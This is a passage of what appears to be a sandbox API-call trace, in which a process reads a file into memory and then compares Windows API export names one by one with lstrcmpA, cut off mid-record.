0x7ffc5ecfd650 [0269.422] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0269.422] GetProcessHeap () returned 0x470000 [0269.422] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0xa3ef0) returned 0x2d02010 [0269.424] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0269.424] ReadFile (in: hFile=0x140, lpBuffer=0x2d02010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d02010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0269.437] CloseHandle (hObject=0x140) returned 1 [0269.437] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0269.437] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0269.437] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAUpdate") returned 1 [0269.437] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="AbortSystemShutdownA") returned 0 [0269.437] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAFinal") returned 1 [0269.437] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAInit") returned 1 [0269.437] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="A_SHAUpdate") returned 1 [0269.437] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownA") returned 1 [0269.437] lstrcmpA (lpString1="AbortSystemShutdownW", lpString2="AbortSystemShutdownW") returned 0 [0269.437] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAFinal") returned 1 [0269.437] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAInit") returned 1 [0269.437] lstrcmpA (lpString1="AccessCheck", lpString2="A_SHAUpdate") returned 1 [0269.437] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownA") returned 1 [0269.437] lstrcmpA (lpString1="AccessCheck", lpString2="AbortSystemShutdownW") returned 1 [0269.437] lstrcmpA (lpString1="AccessCheck", lpString2="AccessCheck") returned 0 [0269.437] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0269.438] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0269.438] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0269.438] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0269.438] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0269.438] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0269.438] lstrcmpA (lpString1="AccessCheckAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 0 [0269.438] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0269.438] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0269.438] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0269.438] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0269.438] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0269.438] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0269.438] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0269.438] lstrcmpA (lpString1="AccessCheckAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 0 [0269.439] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAFinal") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAInit") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByType", lpString2="A_SHAUpdate") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownA") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByType", lpString2="AbortSystemShutdownW") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheck") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByType", lpString2="AccessCheckByType") returned 0 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0269.439] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0269.440] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0269.441] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0269.442] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0269.443] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0269.443] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0269.443] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0269.443] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0269.443] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0269.443] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0269.443] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0269.444] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0269.444] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0269.444] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0269.444] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0269.444] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0269.444] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0269.444] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0269.444] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0269.444] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0269.444] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0269.444] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0269.444] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0269.444] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0269.445] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0269.446] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0269.446] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0269.446] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0269.446] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0269.446] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0269.446] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0269.446] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0269.446] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0269.446] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0269.446] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0269.446] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0269.446] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0269.446] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0269.447] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0269.448] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0269.448] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0269.449] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0269.449] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0269.449] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0269.449] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0269.449] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0269.449] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0269.449] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0269.449] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 